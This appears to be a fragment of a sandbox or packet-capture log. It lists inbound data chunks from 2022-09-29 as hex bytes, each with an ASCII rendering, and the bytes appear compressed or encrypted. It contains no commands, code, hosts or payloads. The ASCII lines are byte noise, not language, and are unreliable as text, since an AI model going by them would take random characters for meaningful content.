                                                                                                                                                2022-09-29 12:51:35 UTC11829INData Raw: 9e c4 23 55 12 24 a7 12 02 48 ed 07 3e 34 0e 43 40 da 49 94 fd 46 15 6b 79 90 b6 90 af 07 b6 a6 5c 2e 0c 77 43 2e 73 0f a2 69 b7 64 78 f5 b0 c4 de 29 2b 33 2a 8b d6 6e e8 ba 13 4f a6 c2 78 62 50 1d a0 07 43 f4 de 48 89 2f 20 aa fd b1 53 21 be 07 c4 f4 5f fa ed 58 b2 aa 07 a1 3b e0 59 8c 65 a9 40 da 10 3e c5 fa 16 c4 65 33 dc 4e e9 bc 8e de 04 07 f1 98 41 1f 5d 7e 89 72 e1 e4 0c bc 9f 76 68 49 9b 1d e2 24 b8 2a 75 cd cd 0e 8d 91 fa 79 18 64 6b 70 18 73 03 5e 40 e6 8e cb 00 13 24 d2 64 17 bf b5 37 d6 c1 05 56 46 2d d8 d7 d6 e2 1c f3 97 92 7b 29 5a 2d 15 ee e3 a1 5b f3 4b cc 97 ff 64 e3 d0 6c c9 13 db 6a 91 c1 0a 14 ea ba 24 2b a0 11 95 c2 1a 82 f0 b4 be aa f7 3e 2b 88 66 35 cd 77 6b 07 13 92 ff 41 59 b5 9e eb 72 e4 f6 c3 fe 34 5b 0c 31 2e df b9 6a 6d 28 25
                                                                                                                                                Data Ascii: #U$H>4C@IFky\.wC.sidx)+3*nOxbPCH/ S!_X;Ye@>e3NA]~rvhI$*uydkps^@$d7VF-{)Z-[Kdlj$+>+f5wkAYr4[1.jm(%
                                                                                                                                                2022-09-29 12:51:35 UTC11830INData Raw: 38 07 55 91 f3 d6 36 13 d1 8d 0e b3 8d ed 0c 36 0a e7 9f a2 6e f9 53 0c 9b 99 b2 01 3f 04 e5 88 85 7c 5d 59 d0 67 f4 53 97 ed 03 42 f0 f9 99 2f 5a 50 f2 ef 9a c1 8b 2d 3d ed d8 3d e9 17 b3 95 58 fc 93 c7 ee 4e 08 37 18 ed 1f 42 5d 02 4c 94 e7 77 e3 3c 07 a4 af 05 0b c0 a3 1b d2 ac a8 94 8d 1b aa cf 6a 29 c6 cb d3 fd 91 57 3c 9a ec b3 5c 31 e5 ac ee b8 49 a0 7e d1 40 a3 cf 46 7b 8d 57 b3 d7 6b 7b 1f ad 84 9b 81 a4 37 c9 41 03 fb ac 7b 0e ce 08 0a d4 63 ed 6d 5f 12 2c 72 12 0f e6 ff 83 47 08 23 30 b7 52 a0 a7 af 18 af f2 44 22 92 45 aa fd 23 20 3b cc af 74 23 bb 45 f5 4b 54 12 21 77 3a 39 52 b9 22 90 f4 bd 72 cc 59 2b 3c 1d 6b 7a 11 28 c9 02 86 e5 b3 91 26 99 5f e3 c7 44 b7 61 f3 04 41 cd 8e ca e7 ef 0c 04 65 30 aa 49 08 49 9e 0b ad 77 de ee 4a 8a 37 fa de
                                                                                                                                                Data Ascii: 8U66nS?|]YgSB/ZP-==XN7B]Lw<j)W<\1I~@F{Wk{7A{cm_,rG#0RD"E# ;t#EKT!w:9R"rY+<kz(&_DaAe0IIwJ7
                                                                                                                                                2022-09-29 12:51:35 UTC11831INData Raw: 0d a0 75 8c fd 8d cc 9f 2d 8b 08 d8 61 e9 fc 2b 5e 70 43 b8 b1 11 b5 40 41 16 04 eb 9f a9 28 01 21 32 28 39 dd 2a 0b e8 3c 6f e4 26 a2 ab 45 94 dd f7 6e db ab 7a 2b 1d 48 a6 83 94 18 0c 25 9b e5 fb af da 93 c0 3c 93 6b b1 0a df 61 69 ee ca 76 1f 3e bd 6f 9b f7 a4 ab 3f 1e fc 82 b4 ec 62 26 ca 94 26 1a c1 3c 65 45 6c 37 d2 02 4e 08 19 67 3a 67 a3 97 b5 e5 a4 82 1c ab b5 20 2b eb a1 85 d0 d9 0d 4f bb a0 e6 a5 89 21 b3 7e 9c 30 79 cd 03 68 97 b9 7e 4c 9e 99 24 a4 b8 1d 89 3e 7e c4 4b cd 3d 84 41 76 99 ca 2e 2d 00 10 2b 43 d9 bf dc 41 04 07 e8 2a 8f 3f c9 cc 8a 1d 1c fb 45 0e 12 11 23 ea 7c 87 ab dd ba 67 fe dd c3 e2 f0 98 1f d7 28 8e ec 57 03 8e 72 65 95 c8 e2 4f 18 34 ae 19 26 93 79 18 e4 2e 8a 53 dd 74 2e 7e 0b 6d 1f 0b d1 76 c1 2a 6d ef b1 a0 65 84 33 05
                                                                                                                                                Data Ascii: u-a+^pC@A(!2(9*<o&Enz+H%<kaiv>o?b&&<eEl7Ng:g +O!~0yh~L$>~K=Av.-+CA*?E#|g(WreO4&y.St.~mv*me3
                                                                                                                                                2022-09-29 12:51:35 UTC11832INData Raw: b4 be 66 ec 13 a3 26 df 89 3c ed a2 81 08 fb f7 8b 58 35 ed ec a7 25 20 1d 90 a4 79 64 57 b8 b8 c5 a8 3a 5e 63 69 e0 a2 62 df e4 6c 9d 19 56 8f 30 bd d7 d8 0b 64 1a 28 2f 6d 45 3c 08 69 73 cc f1 f9 f7 b1 97 63 6d cd e3 5e ba 11 bf ab 1d 98 88 37 c8 08 62 3b a4 10 43 bf 13 eb 4a 12 08 a8 b6 d9 86 f6 75 7e e5 46 f9 02 9b 9d a4 08 b6 3a aa e5 af 6f 05 37 ed 2b 03 f1 a1 1a ec eb fe 8e 8d 14 16 d1 46 8a 40 8d 44 3a 30 c2 8b 02 89 75 38 29 e9 c6 4c c7 5f 0d 72 9e 85 1e 23 9e df 6a fb 22 0c e9 fe f0 d8 80 52 f1 54 d0 c5 23 d4 9e 41 89 98 ed b2 be d0 7f 07 93 5c cc 1e 81 63 e7 2f 75 c9 a7 ab 19 6a 5f f7 1b 08 9c 02 91 d9 5d 6e 4d 41 c1 87 62 cf a8 e5 8f 5c 86 2d 9b 0e 6d 5c ad 72 21 75 58 9c 52 fd dd 6c fe ea a9 02 83 e2 7e 5d bd 8f 3c 2d 87 57 36 dc 45 ae 56 2a
                                                                                                                                                Data Ascii: f&<X5% ydW:^ciblV0d(/mE<iscm^7b;CJu~F:o7+F@D:0u8)L_r#j"RT#A\c/uj_]nMAb\-m\r!uXRl~]<-W6EV*
                                                                                                                                                2022-09-29 12:51:35 UTC11848INData Raw: 70 85 fe 40 02 51 a2 3e 81 ae de 1b 1d 21 9b 9e 20 f8 46 91 16 32 5b a5 a7 93 41 39 43 4a 58 04 cf e8 e5 4d cc 27 89 40 8a 9e 1d 84 66 81 3b 8b fe e5 0b 0d 24 cb 12 96 b3 fc 9e 2d cb 40 e9 4c 83 55 24 18 44 50 48 20 9a a2 c1 c0 4a 7b e7 16 fe 32 8f e9 fb 59 76 87 48 97 f2 ac 4d 15 16 b6 15 aa 70 ac 23 97 e6 8d 77 0f de 90 55 ca d4 60 61 ba ab 82 b3 20 a4 f6 ff 20 5f 94 42 2e 2a 2e 82 1a 48 f5 64 7f 5b e0 86 07 ac 37 3c 7f 56 a0 0d bf a8 7a 41 a2 7b 4e df be 7a 53 a0 68 2a bc ce d9 9c f4 8a 51 45 c6 b9 48 36 ae c0 af 25 2d 16 d1 12 a5 c0 6e 12 0d c5 60 58 d7 99 94 1d 43 7c bf 4c 14 68 20 68 46 24 d7 5b 22 78 60 98 69 19 a2 37 8f 64 75 8d 58 1f b9 ed c3 ff cd f3 fd 68 96 19 8c 20 b5 db 8d b1 66 ed 6c a0 04 fc 31 ab 22 45 6e 27 36 8a e2 0c 49 c9 c6 9a 84 fd
                                                                                                                                                Data Ascii: p@Q>! F2[A9CJXM'@f;$-@LU$DPH J{2YvHMp#wU`a _B.*.Hd[7<VzA{NzSh*QEH6%-n`XC|Lh hF$["x`i7duXh fl1"En'6I
                                                                                                                                                2022-09-29 12:51:35 UTC11864INData Raw: 2b 99 83 4b 97 da 58 ec 15 c1 84 6d f7 39 3e 56 26 56 af 98 8d 8d 87 b8 1f fa fd 82 dd 32 e7 52 ba 35 a1 7f 76 e5 bf dc 13 5b 4f e9 9c b0 01 f5 f7 98 45 ab e9 29 1f f7 33 11 0d 1f 46 2a cd 3c 85 01 6a 2b c5 6e 90 9e 05 6c 9d 0d af 26 eb d9 40 05 fe a6 67 0f 8d ed 7f a4 39 c3 95 a6 26 f0 32 b4 fa 41 52 02 f6 cc c5 4f 6e 70 f5 a9 3d 68 82 e1 3d da 4c e4 52 aa c2 a0 21 bf a4 81 83 80 05 99 02 3b 5a 58 18 c9 61 4e 13 8e 62 26 cc ed 4e 61 17 34 f4 c6 ff 04 f9 9a 12 7c 1b eb 9f 94 0e 6a 02 c0 21 e7 15 26 c3 34 04 d7 f6 b2 56 40 48 d9 d5 8f 74 b0 b8 1a f3 d2 51 57 b5 62 94 95 b6 60 95 ae f3 b2 04 67 02 7b f0 bd dd c3 62 94 79 e7 50 3b e5 57 a4 3b 60 d1 fe ec f7 03 4b fd 52 80 c5 51 f9 ac f2 27 b4 75 48 2b c9 89 5f 66 75 bd e3 d3 ef d2 e3 cd 49 67 fd 6a 84 4e ab
                                                                                                                                                Data Ascii: +KXm9>V&V2R5v[OE)3F*<j+nl&@g9&2AROnp=h=LR!;ZXaNb&Na4|j!&4V@HtQWb`g{byP;W;`KRQ'uH+_fuIgjN
                                                                                                                                                2022-09-29 12:51:35 UTC11880INData Raw: 8c c5 dd d7 5f 28 68 12 bd 1a b2 88 58 45 eb c1 c6 c5 64 80 9c e7 26 f6 ed 6e 86 58 2b ac 1e 38 dc 3e b5 d9 84 5e 8a 6d 8c ba 2a 7e ad d2 a7 06 f7 ce 1f bb e7 aa b0 c5 8a b2 9e b8 66 3f b8 e0 bb 8f 41 bd 70 b0 10 e1 32 a1 03 6d 84 4d 8f 02 8c c0 66 f0 3d 3a 0e 3a b8 8b f3 ff 2f 5a 0d 47 c5 b5 b6 2c 4e df 57 0d 89 9a 5d cd 43 c8 5f 0e d3 03 82 50 e8 70 1a 14 14 f4 d5 b6 5b 00 f7 bb f3 89 1d 55 d3 ce d5 aa 3e dd 8f ec db 03 19 1f 50 cc 3c 87 19 c3 a8 2b 28 1b ac 59 46 30 14 2d d8 1f 02 6f f8 1c c0 5b b6 d8 60 08 9a c8 12 58 3c 41 22 94 5d 7e 3f 79 30 54 4b 0a 7d 1d 4a df 4f c5 d3 03 26 93 88 e5 43 5e 31 29 08 44 06 01 bf 52 28 56 4b 0e ea 4b db de 1b 54 5c 91 63 31 bc 24 7a d2 e9 3e 8f d2 bc 8a a6 02 e6 8c fc bf 6f 29 52 4e 25 ce f6 d5 78 37 3f 67 14 99 54
                                                                                                                                                Data Ascii: _(hXEd&nX+8>^m*~f?Ap2mMf=::/ZG,NW]C_Pp[U>P<+(YF0-o[`X<A"]~?y0TK}JO&C^1)DR(VKKT\c1$z>o)RN%x7?gT
                                                                                                                                                2022-09-29 12:51:35 UTC11896INData Raw: b0 87 fb 6d ac 3f 05 7c 89 cc 96 95 cc 98 d5 a1 f1 17 d5 50 72 77 4b 18 61 2e e9 12 2d b2 e4 26 58 84 31 b2 07 49 e5 91 ea e7 6e 35 78 0b 35 22 c2 be 7c d0 f5 1c 13 93 4d 62 0b 3a 85 a0 4f c0 fe 63 15 44 69 cc 1d 1e d0 ef 9e 7a a2 c1 00 70 3b 28 26 1d a8 52 a6 45 e6 e2 15 94 30 38 4a 17 28 30 db 96 a1 22 68 2b 56 e6 00 e0 d7 4e 8f 2c 08 d1 94 5d a4 be 79 4b 16 b5 dd d0 46 c2 6d 1e b7 d7 b2 26 b8 6c ec 0c b0 be 99 d0 b5 06 77 81 f2 af 72 dc fa 1b 7f cc 6e 08 09 0c 32 17 35 ba 04 57 b6 ee 66 fc 85 07 a8 c0 48 76 05 58 d8 d6 38 fd 33 60 f0 dc 5f af cb f0 5a 03 79 3a 52 6c e3 43 71 7d 9a 03 cf ed c0 04 1d b3 b9 f8 e5 56 56 57 99 ef 32 1a e7 9e c3 77 b4 06 27 93 87 b4 f4 74 d6 e8 46 d6 02 bc b6 e9 10 5c 9a bf 72 42 64 42 8e c0 c7 09 0e 1f b3 28 7a 62 b3 b9 20
                                                                                                                                                Data Ascii: m?|PrwKa.-&X1In5x5"|Mb:OcDizp;(&RE08J(0"h+VN,]yKFm&lwrn25WfHvX83`_Zy:RlCq}VVW2w'tF\rBdB(zb
                                                                                                                                                2022-09-29 12:51:35 UTC11912INData Raw: e6 9b 97 db 79 dc ed 1e 59 d7 9d 72 93 10 e0 ff ea 07 52 b3 ca 91 53 70 5c a0 8c 36 f0 7d 75 c0 b5 97 f2 85 7f 33 db 3d f9 4a 0b e5 a8 fa b0 5d b7 11 64 2b d4 31 f4 82 8b 69 22 d2 1f 0d 13 96 a6 34 5d 36 9e 31 50 1f 7e cd 6e 0d 85 c0 d9 48 92 9c b1 83 0f b6 8d 30 9e 16 ef 73 2f 0b e0 92 9a 45 f2 3f e6 21 40 78 2b bd e1 8c e8 45 96 5c 11 a4 12 7a 9d 32 be f6 ef d1 5f 9b 48 f3 d8 70 eb 52 28 f6 14 9e 8e 19 be 4b 5a 1c d1 c7 b1 17 e4 c3 b4 b0 aa 5f 4c dc 77 22 86 8e 61 59 55 72 5a 4a af 81 dd 18 10 7a ac 1b 61 36 ab 6c 5f e0 03 76 74 95 38 e9 41 b6 a6 39 18 b1 b2 87 50 c4 5f 28 db d3 3c e5 2b b2 ed 07 bf 16 08 27 e1 bb dc 3a 0a 91 fd 6d a5 90 e1 ba d6 b3 ee 9a bb 3b c0 69 e6 80 9d bc 03 6a 6f 65 c4 8f d6 e1 24 82 c3 1b 30 44 4f 24 d2 6d 3e 49 0d 0a af 04 52
                                                                                                                                                Data Ascii: yYrRSp\6}u3=J]d+1i"4]61P~nH0s/E?!@x+E\z2_HpR(KZ_Lw"aYUrZJza6l_vt8A9P_(<+':m;ijoe$0DO$m>IR
                                                                                                                                                2022-09-29 12:51:35 UTC11928INData Raw: 32 c5 d7 62 65 85 0e 5b 65 27 10 bb ff 25 a2 fd d4 ef 18 40 a2 d1 bf 49 2e 87 b5 34 b9 5a 4e d8 23 8d 53 44 6f f8 ab 0d 23 f5 b3 6f e9 70 d0 af 60 a9 f8 9e fb 2f 7f b2 c0 9d d6 5a a2 56 24 e7 18 97 4c 6c 78 f7 5d b6 97 9c 45 1f 91 3c c6 03 31 5b 69 4c 0a e0 9d c7 78 16 b2 5f f6 6d 14 25 de 1c a5 ae 07 a9 08 3b a9 09 f0 74 be ab 6e 19 02 f3 14 b3 7c d3 a4 fa 85 7e 58 7a f8 a3 f7 69 8d 63 f3 02 93 c6 1f e9 0e 6e 01 eb cd 1f a6 ae d1 25 5c 8c 78 3e 3d a1 3c c3 ac 15 24 71 ed 74 19 72 81 e7 29 4a 0b a3 eb 35 ef cf 31 39 d2 8a d0 7e 57 d3 e9 81 eb 6b 01 a7 db 94 08 a4 7e 47 d1 d3 a4 38 09 55 38 da 8d 2b 9d 5e c1 32 65 d0 05 db b8 49 10 f1 19 16 15 b1 f2 2e 36 50 b1 de 27 f7 ac 3d ba 15 6a 9b ba a3 78 6c b4 19 1c f3 4e 53 3a 03 26 ad 9b db 66 95 85 d4 9b d8 07
                                                                                                                                                Data Ascii: 2be[e'%@I.4ZN#SDo#op`/ZV$Llx]E<1[iLx_m%;tn|~Xzicn%\x>=<$qtr)J519~Wk~G8U8+^2eI.6P'=jxlNS:&f
                                                                                                                                                2022-09-29 12:51:35 UTC11944INData Raw: de 54 c0 80 8b bd 78 d1 fd 54 a2 5d c2 37 01 c3 b5 6b 21 76 5b ce 46 ae db 43 92 2f e8 46 95 0a 9c ce be 36 1c dd 9b 56 05 48 91 d6 17 fa e9 2e e0 f6 52 e2 85 4a 62 f2 e4 02 b1 16 04 a4 0b 5d b6 63 0b 13 0f 8f d5 ef 46 49 cb a7 9e 0f a0 8c 8f 31 84 34 ae 1b 42 77 d5 5c de 3f 07 e6 a6 b6 c5 8d d9 4f 5b 43 5e 0a 20 76 01 f3 30 ae c9 dc 7b 37 25 39 27 2a a2 01 84 52 fd 23 e2 be 07 c6 78 3d 4d 0d 02 13 88 03 de cf 10 8b 22 15 8d da 63 70 8c 5f be ab 35 ef 80 f3 6c e8 8f e3 52 a8 4a 2f f5 c8 e4 50 7a fe 8a 7d 62 9e 68 95 da 09 9c 9d 4c b5 fd 0a 70 82 1f c9 51 34 52 16 8d 78 05 77 58 b4 55 91 93 c7 66 1b e9 cc fb 4a 97 a5 1e df 59 f0 2a 6f 5b 1f 14 df fa ed 82 0e 86 e4 3a 8a a9 2a 82 b7 6c 83 73 41 5e 65 61 66 c9 da 93 ec 3b df a7 63 83 95 df 12 f4 01 d3 03 a6
                                                                                                                                                Data Ascii: TxT]7k!v[FC/F6VH.RJb]cFI14Bw\?O[C^ v0{7%9'*R#x=M"cp_5lRJ/Pz}bhLpQ4RxwXUfJY*o[:*lsA^eaf;c
                                                                                                                                                2022-09-29 12:51:35 UTC11960INData Raw: 4a f0 33 76 30 c4 41 a9 1d 00 c7 09 dc b5 c2 b3 a5 ec d0 a3 f9 95 24 ac 13 25 b9 e8 83 c7 2c 30 17 68 1a 99 e6 af 91 d8 52 5f 85 b3 40 7d bf 51 5c ac c7 df b2 49 a0 b7 f4 ca 2b 5a 1b 47 74 6a db 5b c4 f7 f2 56 a3 86 32 92 af b4 20 3f 61 31 46 a5 47 d9 47 6f 55 df 9c 96 d1 c4 38 0e 9a 34 ba 16 25 24 6b 22 25 53 e3 d1 4d 38 fb e4 6f 69 79 b7 b7 67 2e 85 09 7b 17 f0 9c d2 b2 99 6f 97 b3 94 08 83 6b 56 0b 93 71 4e 2d c5 65 d1 3f 24 cd 39 00 9b 82 f5 69 de 74 f7 f6 bb 2c cf 30 04 a4 64 93 54 bb 6e 6b 66 14 4b 5b 68 e6 cf 63 20 89 18 c9 b7 5e ec 2a 9d 43 ba b8 cd c5 9e 06 83 3a b6 0a 9b 8a 9d ca 86 e4 f5 e5 2c 8e c5 a0 ff cf f9 4a 3a 3d b8 19 4b 77 0c 33 46 7a 62 0d b9 81 de 0e 0f e6 16 d8 b1 30 91 c2 22 fa d5 b4 fb aa c1 5f 5e 6c d0 fa e8 11 37 7c 6a e9 f3 69
                                                                                                                                                Data Ascii: J3v0A$%,0hR_@}Q\I+ZGtj[V2 ?a1FGGoU84%$k"%SM8oiyg.{okVqN-e?$9it,0dTnkfK[hc ^*C:,J:=Kw3Fzb0"_^l7|ji
                                                                                                                                                2022-09-29 12:51:35 UTC11976INData Raw: c4 34 49 26 b1 76 ac f2 6f ea a4 c7 9b 53 86 42 99 74 84 c8 11 e8 86 14 ed bd 89 a1 d5 ff 62 33 3b d1 95 1e fc a4 16 41 ea c6 a7 e6 ff 51 08 7f cb e7 8e 76 ea a4 d4 bb 3f b1 66 5c 1b 46 76 e5 d7 1b 2d 88 07 67 a8 c5 84 81 0f 57 c1 2f 16 ef 0d d4 2f a2 d0 d9 12 0d 62 a2 38 51 16 ef c7 18 6f 81 dc fd ac 18 63 b2 c8 46 ac 90 d5 e9 1c b4 1e c3 bc 16 59 bd 8f ab 42 13 b6 64 1d dd 44 19 9d e9 74 b4 74 2c a1 af ff f2 10 f0 67 8a ba 16 35 f2 a2 c4 43 99 32 06 1f d3 0a 77 3a d6 46 1a c6 6b 75 79 06 93 5b 36 3b ed e1 08 ee 1e 5a 57 39 56 c1 bb 20 d1 e8 5e 5e fa ef 62 ee d8 39 f0 78 a7 bb 20 a5 7e 3c ae 08 51 ad b2 7b 95 3f c8 1d 13 af fe df 70 68 00 a9 3c e9 a2 07 ca e4 eb 67 9b 26 7d 61 8b f1 8b 77 b5 b8 20 b3 ca 6f 88 e4 65 b8 22 0f 88 14 69 ef 43 a2 7f 05 8b a9
                                                                                                                                                Data Ascii: 4I&voSBtb3;AQv?f\Fv-gW//b8QocFYBdDtt,g5C2w:Fkuy[6;ZW9V ^^b9x ~<Q{?ph<g&}aw oe"iC
                                                                                                                                                2022-09-29 12:51:35 UTC11992INData Raw: af 05 18 7f 66 04 c4 f5 c0 ae 88 00 2b aa 98 ef 09 14 c7 b2 92 29 ab 12 71 ab 2d aa 3a d5 8e 8e 3c c1 1e ff 89 7a a7 3c ac 95 8d 80 e2 9f d5 f4 18 c8 e0 2d 58 21 94 99 ea 96 65 8f 9a cb 0e 69 43 69 2f c7 bb 22 af e3 bd 77 40 84 6b 7a 84 62 44 33 f7 27 0b 46 2f 87 ad 7a 3f a6 79 4e 0d 98 1b 6c 7a 09 de 62 a4 50 10 02 db 18 ce d1 95 7c 7b 62 dc 4c f8 88 1e ae e4 b3 21 df 45 ea a6 db 07 02 e7 4c 9e 5c be 5d 31 29 ab b9 27 13 38 f5 2f 63 3e a7 15 39 6b 63 c9 83 74 ad 9f 46 25 f0 51 8f 57 fb 1c e8 c7 b1 07 9d 3c 10 60 87 f1 bb 69 cb e3 8d 5e 57 e6 31 56 af a3 71 4a 07 51 53 92 b5 61 aa 3c 0c 3e fb 94 4a 6b d5 f0 df c0 36 0d e2 1b c1 38 0c 49 e0 7e 1d 54 38 e4 2e 09 1d 76 b9 42 3b 08 46 49 27 1b 44 de d2 03 ae b3 96 d5 be e7 dc 62 e3 47 db 27 21 1e c9 62 6c 52
                                                                                                                                                Data Ascii: f+)q-:<z<-X!eiCi/"w@kzbD3'F/z?yNlzbP|{bL!EL\]1)'8/c>9kctF%QW<`i^W1VqJQSa<>Jk68I~T8.vB;FI'DbG'!blR
                                                                                                                                                2022-09-29 12:51:35 UTC12008INData Raw: 79 e8 a2 aa 02 6d 5c f2 66 24 f2 9a e8 9d 90 1f 20 b3 f6 73 3c ae 7d f9 d6 eb 1f 87 30 3b 03 3f ad 78 f9 cd e1 c8 a7 2c 68 17 34 9f c8 9f 7c d0 83 2c 59 40 c5 33 f7 3e fa 6a 7f 6e f1 66 25 98 22 fe e3 ed e9 db 1e 27 11 d0 47 d2 1a b9 ee b6 59 6d 89 bc 5c 45 e5 e0 f2 e9 e1 30 32 63 23 08 e2 fc 55 58 56 88 34 ce ca a7 1f 45 7a 0d e6 e9 4c 17 2b a2 26 43 6e 97 d9 ea 39 32 dd ca d1 e6 3e 9a 74 5d 10 4a 26 d1 c0 55 51 48 62 f9 e2 fe 26 06 ab ba fa 27 71 8b be 12 c8 27 a5 3e f7 89 7b f2 a6 f0 fa d0 ab 91 18 e3 4d 76 69 59 96 6a e2 94 57 b0 43 cf ef 93 3a 8e 11 36 b3 bf 85 6d 21 91 bf ed 32 48 e2 99 2d 56 2c d3 7e b1 65 1f 79 e0 24 f4 98 4b 99 10 ef 33 31 55 a5 8e a2 15 11 97 05 51 5a 7f 18 a2 ce 0d ac 25 51 f4 3d b0 8f a0 86 02 a7 f5 12 cd e6 97 60 6c 24 18 10
                                                                                                                                                Data Ascii: ym\f$ s<}0;?x,h4|,Y@3>jnf%"'GYm\E02c#UXV4EzL+&Cn92>t]J&UQHb&'q'>{MviYjWC:6m!2H-V,~ey$K31UQZ%Q=`l$
                                                                                                                                                2022-09-29 12:51:35 UTC12024INData Raw: 3d 97 56 2f 2e 42 22 75 0a d5 1b 65 c4 d7 4f 1b be 98 ef a3 12 66 af 66 71 c1 d4 6c 8f 1d 41 9c fb c2 b9 0c 56 95 c1 dd 9b 8f 17 35 5b ef 4e b4 4e ab dc af e4 67 a5 79 3a d9 bb f9 1c 55 ea 0a ba 5c 49 e5 4f 21 b0 26 fd 97 08 7d b7 74 fd a6 5e ee da d7 40 24 69 e8 2d a9 f8 01 7c 10 b5 07 ae 1c b4 bf 50 29 d1 15 c1 bb d5 ff 28 74 a5 de a0 6b e9 19 bf 10 bf f5 d9 36 4b 92 66 77 98 b1 fd b5 cf eb 10 35 76 50 0f 8b 5d aa a9 09 01 91 0a e2 d2 60 c3 7c cc 7a 99 26 1f 8a ff ef 30 35 d0 7d 8c 8e 17 49 e4 89 fe 2e 59 2b 7b 34 9f 01 b9 d4 9b 8e be fc 4b b4 1e b5 fe bc 94 68 04 8d 2a f1 74 86 ca 32 ad 04 67 1a 73 31 7c 64 d3 bd 58 0d bb e2 4f 29 fe a0 a5 9d 40 09 91 48 56 ec 9a 6d f6 63 35 d9 77 80 d3 91 a6 e8 e6 73 1c 4c 70 f9 66 57 2a e8 6c 51 73 26 ad 21 a2 2e 4d
                                                                                                                                                Data Ascii: =V/.B"ueOffqlAV5[NNgy:U\IO!&}t^@$i-|P)(tk6Kfw5vP]`|z&05}I.Y+{4Kh*t2gs1|dXO)@HVmc5wsLpfW*lQs&!.M
                                                                                                                                                2022-09-29 12:51:35 UTC12040INData Raw: 85 d5 59 ec da d6 d1 78 76 ec 66 eb af cf 75 a7 06 8b 28 96 aa f8 6d a9 94 f3 96 dc 75 bc ff c7 b4 0d 69 94 08 f6 eb 98 83 15 77 4e 0b 28 b1 4a b5 08 09 f8 b8 ec e6 2a d1 09 7a b7 50 0c 2e 0d 4d 1a 8e d3 08 98 47 db be 1c 93 69 33 08 d0 1d 66 6e 47 92 83 a3 fa 08 36 84 0a 0e 0d f4 c8 c1 f1 f0 1e 2b 7d 06 1f e3 c3 55 f4 74 1f ad e2 72 aa d2 38 70 56 a2 f6 14 4b dd 29 64 26 45 28 56 19 ed a3 1c 8b a4 7c 7b de 50 48 6c 7a 1d 95 a3 d6 5e d0 4a fe 0c 70 9f 4b 30 3b 4b 33 77 53 52 32 e8 41 52 a8 05 6d 4e a1 d5 71 ec 73 ff 30 df 3c 33 6a e0 23 c8 c9 85 9a ce 44 5b db bf 24 be 32 e0 39 f7 e8 60 3b 7f 3c 2d 8e e2 e9 11 f3 f5 57 b0 c1 68 54 27 18 e1 9b 54 d1 65 c3 6f dd 49 b3 ec 87 ca 61 53 cf 4a 3b 0c eb 64 fe 93 ef a2 c4 eb 4a 85 06 bf a4 27 b6 68 82 21 7f e6 dd
                                                                                                                                                Data Ascii: Yxvfu(muiwN(J*zP.MGi3fnG6+}Utr8pVK)d&E(V|{PHlz^JpK0;K3wSR2ARmNqs0<3j#D[$29`;<-WhT'TeoIaSJ;dJ'h!
                                                                                                                                                2022-09-29 12:51:35 UTC12056INData Raw: 6b c6 7b 9f 54 95 a9 a1 42 d8 cd 9d 38 f7 f8 f2 55 93 d7 64 28 92 1c 43 7f 41 c1 9a aa 61 ec 14 d1 b9 89 af 70 47 d6 51 8d 01 07 48 5b cb ae 62 81 db 3d c9 6a 1f 7f d7 31 33 68 e7 25 94 08 92 34 7c c8 00 7f 22 74 30 23 2a d4 b3 9a 8b 02 c1 f6 9b 8d 1d d0 26 84 4d a5 5c 73 a8 94 32 fb 64 25 a5 c0 0d 41 66 e5 1e 9e c7 b5 40 98 f4 f1 bc b1 8f 35 57 47 15 45 04 a1 d7 a7 22 42 75 a2 cf ff 4a f9 5e ca 7b 5a dc b1 3c 7b 96 a3 55 64 5a eb 8d 72 24 ea a9 db 29 08 52 d1 c7 6d a1 b2 de 20 4c b6 7c 67 0a 80 00 39 1c ea a8 1c 50 9a 73 27 50 05 91 25 5b 63 d9 e9 5a f8 0c 5d 6b f7 31 2b 89 85 65 29 db 21 f6 91 e9 cf 78 ff 79 68 38 6f 56 0d f4 1e 71 74 f5 55 73 bc e6 da de 64 e5 ae 30 71 93 0c b0 8f ff 3f ed 69 64 06 3c c3 e9 8d 25 65 31 c9 5e 17 97 f5 76 6e 18 b4 37 db
                                                                                                                                                Data Ascii: k{TB8Ud(CAapGQH[b=j13h%4|"t0#*&M\s2d%Af@5WGE"BuJ^{Z<{UdZr$)Rm L|g9Ps'P%[cZ]k1+e)!xyh8oVqtUsd0q?id<%e1^vn7
                                                                                                                                                2022-09-29 12:51:35 UTC12072INData Raw: 56 4c b5 eb b0 e2 08 35 b4 35 f9 26 f1 05 b8 4c aa 6d 45 78 a1 d4 d4 73 55 72 c2 4b 32 6f 28 d8 ef 24 38 30 d3 45 bf 89 a7 0a 95 64 5c 1b 17 60 c0 2b 19 ee 93 68 05 5a 61 af 7b 28 12 b7 67 bc a4 aa 8b aa 56 ca 67 63 1d 4a 98 21 bf 71 cb 2b a7 93 a7 5c 3f a9 81 ea bc 75 30 f6 23 02 1e f3 46 ea 0e f2 39 c9 a5 c8 9b 43 14 d3 c6 d8 f5 92 3b e0 cd 35 f7 d2 42 da 97 37 fa bf ad 00 00 cf 4f ea bf 79 dc 16 ed 34 e4 3a c9 46 c3 2f a8 9b 2e 43 c9 81 08 91 65 11 78 59 3b ce 51 98 e0 5a 74 cd 68 4a d4 aa ef 5d 7f cf e6 87 37 e0 03 62 90 f7 5a 78 71 f4 58 a9 9b f8 96 4a 8e 22 31 2d c9 24 10 76 de b2 d9 2a 78 8d c4 73 02 00 70 a9 66 81 c6 c4 00 f3 e9 2b e5 62 42 e4 ed be e1 23 90 0a ee 62 bc 89 61 d4 9f 7a 09 06 f3 12 6e 9f 86 65 dd 38 98 0b 7b ca 4f f7 2b 9c 42 d0 40
                                                                                                                                                Data Ascii: VL55&LmExsUrK2o($80Ed\`+hZa{(gVgcJ!q+\?u0#F9C;5B7Oy4:F/.CexY;QZthJ]7bZxqXJ"1-$v*xspf+bB#bazne8{O+B@
